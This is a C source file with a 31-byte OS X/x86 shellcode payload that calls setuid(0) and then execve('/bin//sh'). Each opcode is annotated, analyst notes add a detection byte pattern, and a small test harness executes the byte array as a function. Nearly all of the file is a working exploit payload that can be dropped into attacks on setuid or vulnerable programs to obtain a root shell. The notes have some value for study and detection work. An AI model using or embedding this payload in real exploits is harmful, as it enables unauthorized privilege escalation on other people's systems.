/*
 * revenge-setuid-osx.c, v1.0 2006/12/11 16:30
 *
 * osx/x86 setuid(0) + execve("/bin//sh",["/bin//sh"],NULL) shellcode
 *
 * http://www.0xcafebabe.it
 *
 * 31 bytes  [ (setuid 8 bytes) + (execve 23 bytes) ]
 *
 * Analyst notes:
 *  - Both system calls are made through the 32-bit `int 0x80` gate with
 *    the call number in AL and the arguments on the stack.
 *  - None of the 31 bytes is 0x00; the doubled slash in "/bin//sh" pads
 *    the path to exactly two 4-byte immediates.
 *  - Detection: the ten bytes 68 2f 2f 73 68 68 2f 62 69 6e (the two
 *    path pushes) form a fixed pattern, and at runtime the behaviour is
 *    a setuid(0) immediately followed by an execve of a shell.
 */

char shellcode[] =
    /* ---- setuid(0): 8 bytes ---- */
    "\x31\xc0"              /* xor  eax, eax      ; eax = 0                    */
    "\x50"                  /* push eax           ; uid argument (0)           */
    "\x50"                  /* push eax           ; extra stack slot           */
    "\xb0\x17"              /* mov  al, 0x17      ; call number 23 (setuid)    */
    "\xcd\x80"              /* int  0x80                                       */

    /* ---- execve("/bin//sh", ...): 23 bytes ---- */
    "\x99"                  /* cdq                ; edx = sign of eax; zero    */
                            /*                      when eax is non-negative   */
    "\x52"                  /* push edx           ; string terminator          */
    "\x68\x2f\x2f\x73\x68"  /* push "//sh"                                     */
    "\x68\x2f\x62\x69\x6e"  /* push "/bin"                                     */
    "\x89\xe3"              /* mov  ebx, esp      ; ebx -> "/bin//sh"          */
    "\x52"                  /* push edx           ; zero word                  */
    "\x54"                  /* push esp           ; the next four pushes lay   */
    "\x54"                  /* push esp           ; out the argument slots;    */
    "\x53"                  /* push ebx           ; the header describes them  */
    "\x53"                  /* push ebx           ; as argv=[path], envp=NULL  */
    "\xb0\x3b"              /* mov  al, 0x3b      ; call number 59 (execve)    */
    "\xcd\x80";             /* int  0x80                                       */

/* Signature of the payload when it is called as a C function. */
typedef void (*payload_fn)(void);

/*
 * Test harness: treats the byte array as a function and calls it.
 *
 * The array is an initialized, writable global. Where data pages are
 * mapped non-executable (NX / W^X), the indirect call below faults
 * instead of running the bytes.
 */
int main (int ac, char **av)
{
    payload_fn entry = (payload_fn)shellcode;

    entry();
    return 0;
}